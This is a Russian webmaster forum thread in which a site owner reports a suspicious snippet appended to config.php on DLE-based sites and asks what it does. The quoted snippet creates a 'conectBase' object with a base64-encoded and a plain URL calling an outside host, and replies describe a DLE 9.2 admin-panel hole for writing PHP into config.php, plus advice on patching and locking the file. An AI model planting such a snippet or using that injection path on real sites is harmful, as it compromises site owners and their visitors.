- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу

Зачем быть уникальным в мире, где все можно скопировать
Почему так важна уникальность текста и как она влияет на SEO
Ingate Organic
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
В общем обнаружил что на всех сайтах на DLE в config.php появился такой код в самом низу.
Если кто разбирается, подскажите, какая цель злоумышленников?
$conectBase = new conectBase('aHR0cDovL2ViYW5pLWthcmFzaS53cy9jb25lY3QucGhwP3VybD0=');
$conectBase = new conectBase('http://ebani-karasi.ws/conect.php?url=');
http://ebani-karasi.ws/conect.php?url= - вот что то туда соединяется ...
мудренный скрипт ... как то связан с яндексом и гуглом .. трафик чтоли перекидывает ...
Кто в теме ... мне тоже интересно. Заранее спасибо
В 9.2 есть дыра, которая позволяет из админки вносить php код прямо в config.php, советую обновится и сменить все пароли админов, в последней версии есть логирование кто и что делает в админке
В 9.2 есть дыра, которая позволяет из админки вносить php код прямо в config.php, советую обновится и сменить все пароли админов, в последней версии есть логирование кто и что делает в админке
Для использования этой дыры админ права нужны?
Для использования этой дыры админ права нужны?
Зачем, если сразу позволяет внедрить php код. :)
wolfston, а можно пример это дыры именно в 9.2, или хотябы сторону куда копать, я сколько не пытался так ничего и не нашел. С виду вроде все прикрыто. Может я что-то упустил?..
Для использования этой дыры админ права нужны?
Нужны, точно не помню но сам смысл в том что редактируется форма сохранения настроек скрипта и передается туда вместо данных php код, который пишется в config.php
Вродебы фиксиле ее уже в 9.3, точно не помню, еще в 9.2 была дыра, которая позволяет менять пароль админки на любой, тоже фикс выходил, но сколько по нету еще не фиксеных инсталов ходит, особенно нуледов.
Скорее всего недостаточная фильтрация данных при сохранении параметров, а так - удалить код и закрыть от записи config.php chmod'ом, не каждый же день параметры меняете.
Вродебы фиксиле ее уже в 9.3
Фиксиле ее уже в 9.2. Вот нету под рукой 9.0 посмотреть.
еще в 9.2 была дыра, которая позволяет менять пароль админки на любой, тоже фикс выходил
Вот это что новое, пруфлинк на багфикс можно?
Вот это что новое, пруфлинк на багфикс можно?
Ой, сорри, ошибочка вышла в 8.2 была бага